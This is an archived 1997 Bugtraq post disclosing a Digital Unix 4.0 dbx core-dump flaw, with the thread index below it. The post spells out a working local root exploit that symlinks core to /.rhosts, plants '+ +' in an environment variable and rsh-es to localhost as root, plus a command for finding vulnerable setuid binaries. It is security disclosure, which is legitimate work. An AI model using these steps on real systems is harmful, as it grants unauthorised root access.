Bugtraq mailing list archives
digital unix 4.0 hole
From: jmcdonal () OSPREY UNF EDU (John McDonald)
Date: Fri, 14 Nov 1997 12:37:20 -0500
I've verified this on 3 boxes running Digital unix 4.0.. If you run dbx (tested on 3.11.10) on a setuid root program that you have read access to, the program will core dump and create a root owned 600 perm core in the current directory. You might have to run dbx one or two times to get it to work.. The message you are looking for is: dbx version 3.11.10 Type 'help' for help. warning: /bin/crontab has no symbol table -- very little is supported without it Could not attach to process 10112 cannot run program Exiting due to error during startup Now, this core dump will follow symlinks.. and using the trick mentioned earlier with embedding + + in a core dump, you can easily grab root. ln -s /.rhosts core BOB42=" + + " export BOB42 dbx /bin/crontab rsh -l root localhost /bin/sh -i I'm not sure this will work on other Digital Unix boxes, and I'm not sure why it works.. So, email me if you get it to work.. I'm not sure, but I think this might be a bug in the process-tracing implementation.. I think this will locate all of the vulnerable setuid binaries - find / -perm -4004 -print humble - jmcdonal () unf edu
Current thread:
- Re: mode of the i586 F0 bug, (continued)
- Re: mode of the i586 F0 bug Alan Cox (Nov 12)
- Linux F00F Patch Aleph One (Nov 12)
- Re: Safe /tmp cleanup Randal Schwartz (Nov 12)
- Re: Safe /tmp cleanup dsiebert () ICAEN UIOWA EDU (Nov 13)
- another buffer overrun in sperl5.003 Pavel Kankovsky (Nov 13)
- Re: Safe /tmp cleanup Valdis Kletnieks (Nov 13)
- IE4.0 patch Richard Trott (Nov 13)
- X Security problem (?) Carlo Wood (Nov 13)
- Re: X Security problem (?) Matthias Buelow (Nov 14)
- Re: X Security problem (?) Scott Moseman (Nov 14)
- digital unix 4.0 hole John McDonald (Nov 14)
- What to do when you forget your cisco LD password... Dustin Sallings (Nov 13)
- Re: What to do when you forget your cisco LD password... John Bashinski (Nov 14)
- Re: Safe /tmp cleanup Erik Troan (Nov 13)
- Linux IP fragment overlap bug G P R (Nov 13)
- Re: Linux IP fragment overlap bug Alan Cox (Nov 14)
- Re: Linux IP fragment overlap bug Vadim Kolontsov (Nov 14)
- Re: Linux IP fragment overlap bug David LeBlanc (Nov 14)
- Re: Linux IP fragment overlap bug Morbid Dead Guy (Nov 16)
- Windows 95 IP Fragmentation Bug Fix? Aleph One (Nov 17)
- The Linux patch. G P R (Nov 14)